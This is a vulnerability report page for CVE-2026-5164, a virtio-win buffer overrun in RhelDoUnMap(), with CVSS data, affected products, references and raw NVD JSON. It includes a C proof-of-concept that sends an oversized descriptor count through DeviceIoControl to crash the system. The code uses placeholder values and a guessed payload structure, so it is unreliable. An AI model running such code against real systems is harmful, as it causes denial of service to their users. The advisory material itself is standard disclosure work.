Security Vulnerability Report
CVE-2026-5164 CVSS 6.7 MEDIUM

Published: 2026-03-30 15:16:36
Last Modified: 2026-04-28 14:22:24

Description

A flaw was found in virtio-win. The `RhelDoUnMap()` function does not properly validate the number of descriptors provided by a user during an unmap request. A local user could exploit this input validation vulnerability by supplying an excessive number of descriptors, leading to a buffer overrun. This can cause a system crash, resulting in a Denial of Service (DoS).

CVSS Details

CVSS Score: 6.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:redhat:virtio-win:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:* - VULNERABLE
virtio-win (specific versions prior to the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
// PoC for CVE-2026-5164
// This code demonstrates triggering the buffer overrun in virtio-win by sending
// an unmap request with an excessive number of descriptors.
// Note: Requires local high privileges and specific driver environment.
#include <windows.h>
#include <stdio.h>

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;

    // Placeholder for actual device path
    char devicePath[] = "\\\\.\\VirtIODevice";
    // Placeholder for actual UnMap IOCTL code
    DWORD ioctlCode = 0xXXXX;

    // Open a handle to the vulnerable driver
    hDevice = CreateFileA(devicePath, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                          OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device. Error: %lu\n", GetLastError());
        return 1;
    }

    // Structure representing the unmap payload
    typedef struct _UNMAP_PAYLOAD {
        ULONG DescriptorCount;
        PVOID Descriptors;
    } UNMAP_PAYLOAD;

    UNMAP_PAYLOAD payload;
    // Set an abnormally high number to trigger the overflow
    payload.DescriptorCount = 0xFFFFFFFF;
    payload.Descriptors = NULL;

    printf("Sending malicious payload to trigger buffer overrun...\n");

    // Send the IOCTL request
    BOOL result = DeviceIoControl(
        hDevice,
        ioctlCode,
        &payload,
        sizeof(payload),
        NULL,
        0,
        &bytesReturned,
        NULL
    );

    if (!result) {
        printf("DeviceIoControl failed. Error: %lu\n", GetLastError());
    } else {
        printf("Payload sent successfully. System may crash.\n");
    }

    CloseHandle(hDevice);
    return 0;
}
```

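References

https://access.redhat.com/security/cve/CVE-2026-5164 - Vendor Advisory
https://bugzilla.redhat.com/show_bug.cgi?id=2453014 - Issue Tracking, Vendor Advisory
https://github.com/virtio-win/kvm-guest-drivers-windows/pull/1504 - Issue Tracking, Patch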

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5164", "sourceIdentifier": "[email protected]", "published": "2026-03-30T15:16:36.180", "lastModified": "2026-04-28T14:22:23.607", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in virtio-win. The `RhelDoUnMap()` function does not properly validate the number of descriptors provided by a user during an unmap request. A local user could exploit this input validation vulnerability by supplying an excessive number of descriptors, leading to a buffer overrun. This can cause a system crash, resulting in a Denial of Service (DoS)."}, {"lang": "es", "value": "Se encontró una falla en virtio-win. La función 'RhelDoUnMap()' no valida correctamente el número de descriptores proporcionados por un usuario durante una solicitud de desmapeo. Un usuario local podría explotar esta vulnerabilidad de validación de entrada al proporcionar un número excesivo de descriptores, lo que lleva a un desbordamiento de búfer. Esto puede causar una caída del sistema, resultando en una denegación de servicio (DoS)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, 
"exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:virtio-win:-:*:*:*:*:*:*:*", "matchCriteriaId": "3C9702E9-461D-4BEC-9AD4-EE6C8D5E3327"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-5164", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453014", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/virtio-win/kvm-guest-drivers-windows/pull/1504", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}